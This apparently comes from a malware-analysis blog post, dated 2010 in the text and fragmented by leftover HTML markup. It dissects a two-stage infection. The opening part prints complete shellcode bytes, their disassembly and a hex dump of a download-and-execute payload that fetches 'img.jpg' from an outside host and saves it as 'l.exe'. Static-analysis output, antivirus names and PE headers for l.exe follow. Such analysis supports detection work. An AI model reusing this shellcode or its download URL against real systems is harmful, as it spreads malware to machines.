<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n"\\x8B\\x6C\\x24\\x04\\x8D\\xB5\\x00\\x04\\x00\\x00\\x68\\x94\\x00\\x00\\x00\\x8F"\n"\\x06\\x56\\xFF\\x55\\x14\\x83\\x7E\\x08\\x01\\x75\\x2D\\x8D\\x45\\x22\\x50\\xFF"\n"\\x55\\x00\\x55\\x5E\\x87\\xEF\\x83\\xC7\\x18\\x8B\\xE8\\xE8\\x1B\\x00\\x00\\x00"\n"\\x33\\xC9\\x51\\x51\\x8D\\x46\\x1C\\x50\\x8D\\x46\\x29\\x50\\x51\\xFF\\x56\\x18"\n"\\x8D\\x46\\x1C\\x50\\x50\\xFF\\x56\\x0C\\xFF\\x56\\x10\\x51\\x56\\x8B\\x75\\x3C"\n"\\x8B\\x74\\x35\\x78\\x03\\xF5\\x56\\x8B\\x76\\x20\\x03\\xF5\\x33\\xC9\\x49\\x41"\n"\\xAD\\x03\\xC5\\x33\\xDB\\x0F\\xBE\\x10\\x38\\xF2\\x74\\x08\\xC1\\xCB\\x0D\\x03"\n"\\xDA\\x40\\xEB\\xF1\\x3B\\x1F\\x75\\xE7\\xCC\\x8B\\x5E\\x24\\x03\\xDD\\x66\\x8B"\n"\\x0C\\x4B\\x8B\\x5E\\x1C\\x03\\xDD\\x8B\\x04\\x8B\\x03\\xC5\\xAB\\x5E\\x59\\xC3"\n"\\xE8\\x14\\xFF\\xFF\\xFF\\x7B\\x1D\\x80\\x7C\\xD7\\x06\\x81\\x7C\\xF1\\x9A\\x80"\n"\\x7C\\x0D\\x25\\x86\\x7C\\xF8\\xC0\\x80\\x7C\\x7E\\x2B\\x81\\x7C\\x36\\x1A\\x2F"\n"\\x70\\x6C\\x2E\\x65\\x78\\x65\\x00\\x75\\x72\\x6C\\x6D\\x6F\\x6E\\x00\\x68\\x74"\n"\\x74\\x70\\x3A\\x2F\\x2F\\x6C\\x6F\\x67\\x2E\\x79\\x35\\x75\\x2E\\x69\\x6E\\x66"\n"\\x6F\\x3A\\x34\\x34\\x33\\x2F\\x69\\x6D\\x67\\x2E\\x6A\\x70\\x67\\x00\\x00\\x00";<\/pre>\n
004021C0 8B6C24 04 MOV EBP,DWORD PTR SS:[ESP+4]\n004021C4 8DB5 00040000 LEA ESI,DWORD PTR SS:[EBP+400]\n004021CA 68 94000000 PUSH 94\n004021CF 8F06 POP DWORD PTR DS:[ESI]\n004021D1 56 PUSH ESI\n004021D2 FF55 14 CALL DWORD PTR SS:[EBP+14]\n004021D5 837E 08 01 CMP DWORD PTR DS:[ESI+8],1\n004021D9 75 2D JNZ SHORT TestPayl.00402208\n004021DB 8D45 22 LEA EAX,DWORD PTR SS:[EBP+22]\n004021DE 50 PUSH EAX\n004021DF FF55 00 CALL DWORD PTR SS:[EBP]\n004021E2 55 PUSH EBP\n004021E3 5E POP ESI\n004021E4 87EF XCHG EDI,EBP\n004021E6 83C7 18 ADD EDI,18\n004021E9 8BE8 MOV EBP,EAX\n004021EB E8 1B000000 CALL TestPayl.0040220B\n004021F0 33C9 XOR ECX,ECX\n004021F2 51 PUSH ECX\n004021F3 51 PUSH ECX\n004021F4 8D46 1C LEA EAX,DWORD PTR DS:[ESI+1C]\n004021F7 50 PUSH EAX\n004021F8 8D46 29 LEA EAX,DWORD PTR DS:[ESI+29]\n004021FB 50 PUSH EAX\n004021FC 51 PUSH ECX\n004021FD FF56 18 CALL DWORD PTR DS:[ESI+18]\n00402200 8D46 1C LEA EAX,DWORD PTR DS:[ESI+1C]\n00402203 50 PUSH EAX\n00402204 50 PUSH EAX\n00402205 FF56 0C CALL DWORD PTR DS:[ESI+C]\n00402208 FF56 10 CALL DWORD PTR DS:[ESI+10]\n0040220B 51 PUSH ECX\n0040220C 56 PUSH ESI\n0040220D 8B75 3C MOV ESI,DWORD PTR SS:[EBP+3C]\n00402210 8B7435 78 MOV ESI,DWORD PTR SS:[EBP+ESI+78]\n00402214 03F5 ADD ESI,EBP\n00402216 56 PUSH ESI\n00402217 8B76 20 MOV ESI,DWORD PTR DS:[ESI+20]\n0040221A 03F5 ADD ESI,EBP\n0040221C 33C9 XOR ECX,ECX\n0040221E 49 DEC ECX\n0040221F 41 INC ECX\n00402220 AD LODS DWORD PTR DS:[ESI]\n00402221 03C5 ADD EAX,EBP\n00402223 33DB XOR EBX,EBX\n00402225 0FBE10 MOVSX EDX,BYTE PTR DS:[EAX]\n00402228 38F2 CMP DL,DH\n0040222A 74 08 JE SHORT TestPayl.00402234\n0040222C C1CB 0D ROR EBX,0D\n0040222F 03DA ADD EBX,EDX\n00402231 40 INC EAX\n00402232 ^EB F1 JMP SHORT TestPayl.00402225\n00402234 3B1F CMP EBX,DWORD PTR DS:[EDI]\n00402236 ^75 E7 JNZ SHORT TestPayl.0040221F\n00402238 CC INT3\n00402239 8B5E 24 MOV EBX,DWORD PTR DS:[ESI+24]\n0040223C 03DD ADD EBX,EBP\n0040223E 66:8B0C4B MOV CX,WORD PTR DS:[EBX+ECX*2]\n00402242 8B5E 1C MOV EBX,DWORD PTR DS:[ESI+1C]\n00402245 03DD ADD EBX,EBP\n00402247 8B048B MOV EAX,DWORD PTR DS:[EBX+ECX*4]\n0040224A 03C5 ADD EAX,EBP\n0040224C AB STOS DWORD PTR ES:[EDI]\n0040224D 5E POP ESI\n0040224E 59 POP ECX\n0040224F C3 RETN\n00402250 E8 14FFFFFF CALL TestPayl.00402169\n00402255 7B 1D JPO SHORT TestPayl.00402274\n00402257 807CD7 06 81 CMP BYTE PTR DS:[EDI+EDX*8+6],81\n0040225C ^7C F1 JL SHORT TestPayl.0040224F\n0040225E 9A 807C0D25 867C CALL FAR 7C86:250D7C80 ; Far call\n00402265 F8 CLC\n00402266 C080 7C7E2B81 7C ROL BYTE PTR DS:[EAX+812B7E7C],7C ; Shift constant out of range 1..31\n0040226D 36:1A2F SBB CH,BYTE PTR SS:[EDI]\n00402270 70 6C JO SHORT TestPayl.004022DE\n00402272 2E: PREFIX CS: ; Superfluous prefix\n00402273 65:78 65 JS SHORT TestPayl.004022DB ; Superfluous prefix\n00402276 0075 72 ADD BYTE PTR SS:[EBP+72],DH\n00402279 6C INS BYTE PTR ES:[EDI],DX ; I\/O command\n0040227A 6D INS DWORD PTR ES:[EDI],DX ; I\/O command\n0040227B 6F OUTS DX,DWORD PTR ES:[EDI] ; I\/O command\n0040227C 6E OUTS DX,BYTE PTR ES:[EDI] ; I\/O command\n0040227D 0068 74 ADD BYTE PTR DS:[EAX+74],CH\n00402280 74 70 JE SHORT TestPayl.004022F2\n00402282 3A2F CMP CH,BYTE PTR DS:[EDI]\n00402284 2F DAS\n00402285 6C INS BYTE PTR ES:[EDI],DX ; I\/O command\n00402286 6F OUTS DX,DWORD PTR ES:[EDI] ; I\/O command\n00402287 67:2E:79 35 JNS SHORT TestPayl.004022C0 ; Superfluous prefix\n0040228B 75 2E JNZ SHORT TestPayl.004022BB\n0040228D 696E 66 6F3A3434 IMUL EBP,DWORD PTR DS:[ESI+66],34343A6F\n00402294 332F XOR EBP,DWORD PTR DS:[EDI]\n00402296 696D 67 2E6A7067 IMUL EBP,DWORD PTR SS:[EBP+67],67706A2E<\/pre>\n
HANDLE WINAPI CreateThread(\n __in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes,\n __in SIZE_T dwStackSize,\n __in LPTHREAD_START_ROUTINE lpStartAddress,\n __in_opt LPVOID lpParameter,\n __in DWORD dwCreationFlags,\n __out_opt LPDWORD lpThreadId\n);<\/pre>\n
00480095 7B 1D 80 7C D7 06 81 7C F1 9A 80 7C 0D 25 86 7C {\u20ac|\u00d7\u0081|\u00f1\u0161\u20ac|.%\u2020|\n004800A5 F8 C0 80 7C 7E 2B 81 7C 36 1A 2F 70 6C 2E 65 78 \u00f8\u00c0\u20ac|~+\u0081|6\/pl.ex\n004800B5 65 00 75 72 6C 6D 6F 6E 00 68 74 74 70 3A 2F 2F e.urlmon.http:\/\/\n004800C5 6C 6F 67 2E 79 35 75 2E 69 6E 66 6F 3A 34 34 33 log.y5u.info:443\n004800D5 2F 69 6D 67 2E 6A 70 67 \/img.jpg<\/pre>\n\n
36 1A 2F 70 6\/p<\/pre>\n
004800A5 6C 2E 65 78 l.ex\n004800B5 65 00 75 72 6C 6D 6F 6E 00 68 74 74 70 3A 2F 2F e.urlmon.http:\/\/\n004800C5 6C 6F 67 2E 79 35 75 2E 69 6E 66 6F 3A 34 34 33 log.y5u.info:443\n004800D5 2F 69 6D 67 2E 6A 70 67 \/img.jpg<\/pre>\n
\n
\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n0068FFA4 00000000 ....\n0068FFA8 004800BE \u00be.H. ASCII "http:\/\/log.y5u.info:443\/img.jpg"\n0068FFAC 004800B1 \u00b1.H. ASCII "l.exe"\n0068FFB0 00000000 ....<\/pre>\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\nDecember 2nd, 2010 21:43:55 GMT+1 - stage 2 (l.exe)<\/h3>\n
00403000 GetProcAddress KERNEL32\n00403004 GetModuleHandleA KERNEL32\n00403008 IsBadReadPtr KERNEL32\n0040300C GetStartupInfoA KERNEL32\n00403014 strcpy MSVCRT \n00403018 _except_handler3 MSVCRT \n0040301C memset MSVCRT \n00403020 _exit MSVCRT \n00403024 _XcptFilter MSVCRT \n00403028 exit MSVCRT \n0040302C _acmdln MSVCRT \n00403030 __getmainargs MSVCRT \n00403034 strcat MSVCRT \n00403038 __setusermatherr MSVCRT \n0040303C _adjust_fdiv MSVCRT \n00403040 __p__commode MSVCRT \n00403044 __p__fmode MSVCRT \n00403048 __set_app_type MSVCRT \n0040304C _controlfp MSVCRT \n00403050 strlen MSVCRT \n00403054 memcpy MSVCRT \n00403058 malloc MSVCRT \n0040305C _initterm MSVCRT \n00403060 free MSVCRT <\/pre>\n
<\/a><\/p>\n\n
|---------------------------------------------------------------|\n| beenudel1986[@]gmail[dot]com |\n| Malware Analyzer(Static) 2.7 |\n| 06\/2009 analyse_malware.py |\n| Do Visit www.BeenuArora.com |\n| Last Updated : 28-11-2010 |\n|---------------------------------------------------------------|\n\n Analysing if<\/span> PE file...\n\n[+] Valid PE file.\n[+] Malware File Size : 51 KB\n\n Checking for<\/span> Packer Signature....\n Identified packer :Microsoft Visual C++ v6.0\n\n[+] Computing Checksum for<\/span> malware :l.exe\n[-]Checksum of malware :e5871adb818bad139af5549eedb6bf91\n\n-------- Identifying Strings in the malware---------------\n!This program cannot be run in DOS mode.\nRich\n.text\n`.rdata\n@.data\n.rsrc\nQSVW\n_^[Y\nSV3\nVWr(3\n$;>\nI;>t\n})S\n(I_^x\n;T$\n;T$\n\n-----------Performing signatures based scan---------------\n\n[+]Displaying Interesting System Calls Made.\n[-]Signatures not found.....\n\n[+]Displaying Registry Hives Edited.\n[-]Signatures not found.....\n\n[+]Displaying A Little Online Behaviour.\n[-]Signatures not found.....\n\n[+]Displaying the Loaded DLLs.\n[-]Signatures not found.....\n\n[+]Commands Inside the Malware.\n[-]Signatures not found.....\n\n[+]Sys Calls Made. \n[-]Signatures not found.....\n\n[+]Searching if<\/span> malware is VM aware\n[-]Signatures not found.....\n\n---------------------------------------------------------\n!This program cannot be run in DOS mode.\nRich\n.text\n`.rdata\n@.data\n.rsrc\nQSVW\n_^[Y\nSV3\nVWr(3\n$;>\nI;>t\n})S\n(I_^x\n;T$\n;T$\n\nMalware loads following DLLs\n\nMSVCRT.dll\nKERNEL32.dll\n\n[-] Disaassembling the first block\n\n[0x40221cL] mov ebp esp \n[0x40221dL] push 0xff \n[0x40221fL] push 0x403088 \n[0x402221L] push 0x402210 \n[0x402226L] mov eax [fs:0x0] \n[0x40222bL] push eax \n[0x402231L] mov [fs:0x0] esp \n[0x402232L] sub esp 0x68 \n[0x402239L] push ebx \n[0x40223cL] push esi \n[0x40223dL] push r15d \n[0x40223eL] mov [bp-0x18] esp \n[0x40223fL] xor ebx ebx \n[0x402242L] mov [bp-0x4] ebx \n[0x402244L] push 0x2 \n[0x402247L] call [0x403048] \n[0x402249L] pop ecx \n[0x40224fL] or [0x4040e0] 0xff \n[0x402250L] or [0x4040e4] 0xff \n[0x402257L] call [0x403044] \n[0x40225eL] mov ecx [0x4040d4] \n[0x402264L] mov [ax] ecx \n[0x40226aL] call [0x403040] \n[0x40226cL] mov ecx [0x4040d0] \n[0x402272L] mov [ax] ecx \n[0x402278L] mov eax [0x40303c] \n[0x40227aL] mov eax [ax] \n[0x40227fL] mov [0x4040e8] eax \n[0x402281L] call 0x40239bL \n[0x402286L] cmp [0x404010] ebx \n[0x40228bL] jnz 0x40229fL \n[0x402291L] push 0x402398 \n[0x402293L] call [0x403038] \n[0x402298L] pop ecx \n[0x40229eL] call 0x402386L \n[0x40229fL] push 0x40400c \n[0x4022a4L] push 0x404008 \n[0x4022a9L] call 0x402380L \n[0x4022aeL] mov eax [0x4040cc] \n[0x4022b3L] mov [bp-0x6c] eax \n[0x4022b8L] lea eax [bp-0x6c] \n[0x4022bbL] push eax \n[0x4022beL] push [0x4040c8] \n[0x4022bfL] lea eax [bp-0x64] \n[0x4022c5L] push eax \n[0x4022c8L] lea eax [bp-0x70] \n[0x4022c9L] push eax \n[0x4022ccL] lea eax [bp-0x60] \n[0x4022cdL] push eax \n[0x4022d0L] call [0x403030] \n[0x4022d1L] push 0x404004 \n[0x4022d7L] push 0x404000 \n[0x4022dcL] call 0x402380L \n[0x4022e1L] add esp 0x24 \n[0x4022e6L] mov eax [0x40302c] \n[0x4022e9L] mov esi [ax] \n[0x4022eeL] mov [bp-0x74] esi \n[0x4022f0L] cmp [si] 0x22 \n[0x4022f3L] jnz 0x402332L \n[0x4022f6L] inc esi \n[0x4022f8L] mov [bp-0x74] esi \n[0x4022f9L] mov al [si] \n[0x4022fcL] cmp al bl \n[0x4022feL] jz 0x402306L \n[0x402300L] cmp al 0x22 \n[0x402302L] jnz 0x4022f8L \n[0x402304L] cmp [si] 0x22 \n[0x402306L] jnz 0x40230fL \n[0x402309L] inc esi \n[0x40230bL] mov [bp-0x74] esi \n[0x40230cL] mov al [si] \n[0x40230fL] cmp al bl \n[0x402311L] jz 0x402319L \n[0x402313L] cmp al 0x20 \n[0x402315L] jbe 0x40230bL \n[0x402317L] mov [bp-0x30] ebx \n[0x402319L] lea eax [bp-0x5c] \n[0x40231cL] push eax \n[0x40231fL] call [0x40300c] \n[0x402320L] test [bp-0x30] 0x1 \n[0x402326L] jz 0x40233dL \n[0x40232aL] movzx eax [bp-0x2c] \n[0x40232cL] jmp near 0x402340L \n[0x402330L] push eax \n[0x402340L] push esi \n[0x402341L] push ebx \n[0x402342L] push ebx \n[0x402343L] call [0x403004] \n[0x402344L] push eax \n[0x40234aL] call 0x401edfL \n[0x40234bL] mov [bp-0x68] eax \n[0x402350L] push eax \n[0x402353L] call [0x403028] \n[0x402354L] mov eax [bp-0x14] \n[0x40235aL] mov ecx [ax] \n[0x40235dL] mov ecx [cx] \n[0x40235fL] mov [bp-0x78] ecx \n[0x402361L] push eax \n[0x402364L] push ecx \n[0x402365L] call 0x40237aL \n[0x402366L] pop ecx \n[0x40236bL] pop ecx \n[0x40236cL] ret \n\n**This Test shall be performed when you are confirm that suspect is a malware**\n\n Anti Debugging traces identification\n [!] Found a call at: 0x403000 GetProcAddress\n\n Malware File System Activity Traces\n No Filesystem traces :( . Try manually\n\n Malware System Hook Calls \n No System Hook Call traces found :( . Try manually\n\n Malware Keyboard Hook Calls \n No Keyboard Hook Call traces found :( . Try manually\n\n Malware Rootkit traces \n No Rootkit Hook traces found :( . Try manually\n\n DEP Setting Change trace \n No DEP setting change trace found :( . Try manually\n\n DLL Injection trace \n No DLL Injection trace found :( . Try manually\n\n Network Connection Traces\n No Potential Network trace found :( . Try manually\n\n Privilage Escalation Potential Traces\n No Privilage Escalation trace found :( . Try manually\n\n[+] Computing Checksum for<\/span> malware :l.exe\n[-]Checksum of malware :e5871adb818bad139af5549eedb6bf91\n[+] Malware detected! [29\/43] (67.4%)\n [*] Malware names:\n Trojan\/Win32.Vilsel\n TR\/Crypt.ZPACK.Gen\n Trojan\/Win32.Vilsel.gen\n Win32:Rootkit-gen\n Win32:Rootkit-gen\n Generic19.BXFQ\n Trojan.Generic.5007190\n Trojan.Vilsel.auoe\n TrojWare.Win32.Trojan.Agent.Gen\n Trojan.Inject.11207\n Trojan.Win32.Vilsel!IK\n Win32.TRCrypt.ZPACK\n Trojan.Generic.5007190\n W32\/Vilsel.AUOE!tr\n Trojan.Generic.5007190\n Trojan.Win32.Vilsel\n Trojan\/Vilsel.pzv\n Trojan\n Trojan.Win32.Vilsel.auoe\n Artemis!E5871ADB818B\n Artemis!E5871ADB818B\n W32\/Suspicious_Gen2.FPBSH\n Trojan\/W32.Vilsel.51712.L\n Trj\/CI.A\n Trojan.Win32.Generic.523AA010\n Trojan.Vilsel.auoe\n Trojan.Win32.Generic!BT\n Trojan.Vilsel!y3dOZ\/KZxxM\n\n[+] For more information you may visit: \nhttp:\/\/www.virustotal.com\/file-scan\/report.html?id=<\/span>\ndab1de3dc0def76bbb09a9d9a2a3915c5f25bfc93cbf565a66a7cbb336fd134e-1294339231\n\n[!]Creating signatures of the various sections\n[!]Processing....\n[l.exe Section(1\/4,.text)]\nsignature = 51 53 56 57 89 74 24 0c 8b 74 24 0c 33 db 8d 7e 0c 57 ff 16 85 c0 75 \n0e 6a 0a ff 56 04 43 81 fb e8 03 00 00 7c eb 6a 00 ff 56 08 5f 5e 5b 59 c3 8b 4c \n24 04 d1 39 75 17 8b 41 1c 8b 51 10 0f be 14 02 40 89 51 18 89 41 1c c7 01 80 00 \n00 00 8b 41 18 23 01 f7 d8 1b c0 f7 d8 c3 56 8b 74 24 08 33 c0 57 6a\nep_only = false\nsection_start_only = true\n\n[l.exe Section(2\/4,.rdata)]\nsignature = 66 32 00 00 52 32 00 00 42 32 00 00 78 32 00 00 00 00 00 00 68 31 00 \n00 72 31 00 00 86 31 00 00 9c 31 00 00 a4 31 00 00 b2 31 00 00 ba 31 00 00 c4 31 \n00 00 5e 31 00 00 e0 31 00 00 f4 31 00 00 04 32 00 00 14 32 00 00 22 32 00 00 34 \n32 00 00 54 31 00 00 4a 31 00 00 40 31 00 00 d4 31 00 00 38 31 00 00\nep_only = false\nsection_start_only = true\n\n[l.exe Section(3\/4,.data)]\nsignature = 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 \n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\nep_only = false\nsection_start_only = true\n\n[l.exe Section(4\/4,.rsrc)]\nsignature = 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 a0 00 00 80 20 00 00 \n80 02 00 00 00 38 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 \n00 00 50 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 68 \n00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00\nep_only = false\nsection_start_only = true\n\n\nDone\n\n----------DOS_HEADER----------\n\n[IMAGE_DOS_HEADER]\ne_magic: 0x5A4D \ne_cblp: 0x90 \ne_cp: 0x3 \ne_crlc: 0x0 \ne_cparhdr: 0x4 \ne_minalloc: 0x0 \ne_maxalloc: 0xFFFF \ne_ss: 0x0 \ne_sp: 0xB8 \ne_csum: 0x0 \ne_ip: 0x0 \ne_cs: 0x0 \ne_lfarlc: 0x40 \ne_ovno: 0x0 \ne_res: \ne_oemid: 0x0 \ne_oeminfo: 0x0 \ne_res2: \ne_lfanew: 0xF8 \n\n----------NT_HEADERS----------\n\n[IMAGE_NT_HEADERS]\nSignature: 0x4550 \n\n----------FILE_HEADER----------\n\n[IMAGE_FILE_HEADER]\nMachine: 0x14C \nNumberOfSections: 0x4 \nTimeDateStamp: 0x4C89D17F [Fri Sep 10 06:34:39 2010 UTC]\nPointerToSymbolTable: 0x0 \nNumberOfSymbols: 0x0 \nSizeOfOptionalHeader: 0xE0 \nCharacteristics: 0x10F \nFlags: IMAGE_FILE_LOCAL_SYMS_STRIPPED, IMAGE_FILE_32BIT_MACHINE, \nIMAGE_FILE_EXECUTABLE_IMAGE, IMAGE_FILE_LINE_NUMS_STRIPPED, \nIMAGE_FILE_RELOCS_STRIPPED\n\n----------OPTIONAL_HEADER----------\n\n[IMAGE_OPTIONAL_HEADER]\nMagic: 0x10B \nMajorLinkerVersion: 0x7 \nMinorLinkerVersion: 0xA \nSizeOfCode: 0x1400 \nSizeOfInitializedData: 0xB200 \nSizeOfUninitializedData: 0x0 \nAddressOfEntryPoint: 0x221C \nBaseOfCode: 0x1000 \nBaseOfData: 0x3000 \nImageBase: 0x400000 \nSectionAlignment: 0x1000 \nFileAlignment: 0x200 \nMajorOperatingSystemVersion: 0x4 \nMinorOperatingSystemVersion: 0x0 \nMajorImageVersion: 0x0 \nMinorImageVersion: 0x0 \nMajorSubsystemVersion: 0x4 \nMinorSubsystemVersion: 0x0 \nReserved1: 0x0 \nSizeOfImage: 0x10000 \nSizeOfHeaders: 0x400 \nCheckSum: 0x0 \nSubsystem: 0x2 \nDllCharacteristics: 0x0 \nSizeOfStackReserve: 0x100000 \nSizeOfStackCommit: 0x1000 \nSizeOfHeapReserve: 0x100000 \nSizeOfHeapCommit: 0x1000 \nLoaderFlags: 0x0 \nNumberOfRvaAndSizes: 0x10 \nDllCharacteristics: \n\n----------PE Sections----------\n\n[IMAGE_SECTION_HEADER]\nName: .text\nMisc: 0x13F4 \nMisc_PhysicalAddress: 0x13F4 \nMisc_VirtualSize: 0x13F4 \nVirtualAddress: 0x1000 \nSizeOfRawData: 0x1400 \nPointerToRawData: 0x400 \nPointerToRelocations: 0x0 \nPointerToLinenumbers: 0x0 \nNumberOfRelocations: 0x0 \nNumberOfLinenumbers: 0x0 \nCharacteristics: 0x60000020\nFlags: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ\nEntropy: 6.204615 (Min=0.0, Max=8.0)\nMD5 hash: bfda5bd697813445265b021ff092b190\nSHA-1 hash: 173b6e830610269954c8644d20486eaba91d4edd\nSHA-256 hash: fd6473457dc54066784210a106ceb6493dbb8505b20e1522526d4d646eb880c0\nSHA-512 hash: b72ae8257a1f665b06c17d7db4529f898ef2f3ef39395bc34829953b776e536c\n3fe80a584d5732af53878f22c4a0b89d592f03a2d919b36b4d9122215d148b3c\n\n[IMAGE_SECTION_HEADER]\nName: .rdata\nMisc: 0x298 \nMisc_PhysicalAddress: 0x298 \nMisc_VirtualSize: 0x298 \nVirtualAddress: 0x3000 \nSizeOfRawData: 0x400 \nPointerToRawData: 0x1800 \nPointerToRelocations: 0x0 \nPointerToLinenumbers: 0x0 \nNumberOfRelocations: 0x0 \nNumberOfLinenumbers: 0x0 \nCharacteristics: 0x40000040\nFlags: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ\nEntropy: 3.364436 (Min=0.0, Max=8.0)\nMD5 hash: 824c8a3510d93a78cdb8695922939741\nSHA-1 hash: d60002fa765f89076e7cd0c4310be0449ca5d02c\nSHA-256 hash: ab424791cb649a748237215a658252c0d9259f390ec97ac484c5944ab649bd16\nSHA-512 hash: 239f201a5784cd74c999910113a9ad8f969c8040a2c2ff36dc2b15644c72c364\n1c4c6df791d65642102d734b6586cfa6a95b1153c3f72cd6a07c5cbeccc3478f\n\n[IMAGE_SECTION_HEADER]\nName: .data\nMisc: 0xEC \nMisc_PhysicalAddress: 0xEC \nMisc_VirtualSize: 0xEC \nVirtualAddress: 0x4000 \nSizeOfRawData: 0x200 \nPointerToRawData: 0x1C00 \nPointerToRelocations: 0x0 \nPointerToLinenumbers: 0x0 \nNumberOfRelocations: 0x0 \nNumberOfLinenumbers: 0x0 \nCharacteristics: 0xC0000040\nFlags: IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ\nEntropy: 0.020393 (Min=0.0, Max=8.0)\nMD5 hash: 598e1aae6ecbd8237c4383f4be94b9f1\nSHA-1 hash: ab4a6d7509b109b24572e011b0696647c7af25f0\nSHA-256 hash: f60983e21c9cca08114b490d798ca0c0435a6857fd6176a2da8222694af0e852\nSHA-512 hash: 0a74c867644d10bcfb2921fb7a69f0aeee69c519b655e5829d37904d0cc32b30\nddd3a545d02fa83571c2750952b55cc2d7dc2a3c18691ace0b4fc534bb278ac6\n\n[IMAGE_SECTION_HEADER]\nName: .rsrc\nMisc: 0xABB0 \nMisc_PhysicalAddress: 0xABB0 \nMisc_VirtualSize: 0xABB0 \nVirtualAddress: 0x5000 \nSizeOfRawData: 0xAC00 \nPointerToRawData: 0x1E00 \nPointerToRelocations: 0x0 \nPointerToLinenumbers: 0x0 \nNumberOfRelocations: 0x0 \nNumberOfLinenumbers: 0x0 \nCharacteristics: 0x40000040\nFlags: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ\nEntropy: 7.990610 (Min=0.0, Max=8.0)\nMD5 hash: 25fd8acca1c403ecd520139d1a86cb23\nSHA-1 hash: 7edd48c7c153987cb95f4696b1585e407038e5d7\nSHA-256 hash: 2f8d2a24c1fb63346402dc9783b87ee3f72f8f125b459dab9e74e4120986f000\nSHA-512 hash: 8271d44aaa437634976359020509c51d602d17cb793b4588c8c202fb90464d3d\ne1ab243ff0ce0bdb8f27100e1c5ba5d915de7d60c9b49b2f68743ab6eed7badb\n\n----------Directories----------\n\n[IMAGE_DIRECTORY_ENTRY_EXPORT]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_IMPORT]\nVirtualAddress: 0x3094 \nSize: 0x3C \n[IMAGE_DIRECTORY_ENTRY_RESOURCE]\nVirtualAddress: 0x5000 \nSize: 0xABB0 \n[IMAGE_DIRECTORY_ENTRY_EXCEPTION]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_SECURITY]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_BASERELOC]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_DEBUG]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_COPYRIGHT]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_GLOBALPTR]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_TLS]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_IAT]\nVirtualAddress: 0x3000 \nSize: 0x68 \n[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR]\nVirtualAddress: 0x0 \nSize: 0x0 \n[IMAGE_DIRECTORY_ENTRY_RESERVED]\nVirtualAddress: 0x0 \nSize: 0x0 \n\n----------Imported symbols----------\n\n[IMAGE_IMPORT_DESCRIPTOR]\nOriginalFirstThunk: 0x30E4 \nCharacteristics: 0x30E4 \nTimeDateStamp: 0x0 [Thu Jan 01 00:00:00 1970 UTC]\nForwarderChain: 0x0 \nName: 0x3190 \nFirstThunk: 0x3014 \n\nMSVCRT.dll.strcpy<\/span> Hint[698]\nMSVCRT.dll._except_handler3 Hint[202]\nMSVCRT.dll.memset Hint[665]\nMSVCRT.dll._exit Hint[211]\nMSVCRT.dll._XcptFilter Hint[72]\nMSVCRT.dll.exit<\/span> Hint[585]\nMSVCRT.dll._acmdln Hint[143]\nMSVCRT.dll.__getmainargs Hint[88]\nMSVCRT.dll.strcat Hint[694]\nMSVCRT.dll.__setusermatherr Hint[131]\nMSVCRT.dll._adjust_fdiv Hint[157]\nMSVCRT.dll.__p__commode Hint[106]\nMSVCRT.dll.__p__fmode Hint[111]\nMSVCRT.dll.__set_app_type Hint[129]\nMSVCRT.dll._controlfp Hint[183]\nMSVCRT.dll.strlen Hint[702]\nMSVCRT.dll.memcpy Hint[663]\nMSVCRT.dll.malloc<\/span> Hint[657]\nMSVCRT.dll._initterm Hint[271]\nMSVCRT.dll.free<\/span> Hint[606]\n\n[IMAGE_IMPORT_DESCRIPTOR]\nOriginalFirstThunk: 0x30D0 \nCharacteristics: 0x30D0 \nTimeDateStamp: 0x0 [Thu Jan 01 00:00:00 1970 UTC]\nForwarderChain: 0x0 \nName: 0x328A \nFirstThunk: 0x3000 \n\nKERNEL32.dll.GetProcAddress Hint[408]\nKERNEL32.dll.GetModuleHandleA Hint[375]\nKERNEL32.dll.IsBadReadPtr Hint[553]\nKERNEL32.dll.GetStartupInfoA Hint[431]\n\n----------Resource directory----------\n\n[IMAGE_RESOURCE_DIRECTORY]\nCharacteristics: 0x0 \nTimeDateStamp: 0x0 [Thu Jan 01 00:00:00 1970 UTC]\nMajorVersion: 0x0 \nMinorVersion: 0x0 \nNumberOfNamedEntries: 0x1 \nNumberOfIdEntries: 0x1 \n Name: [RESBIN]\n 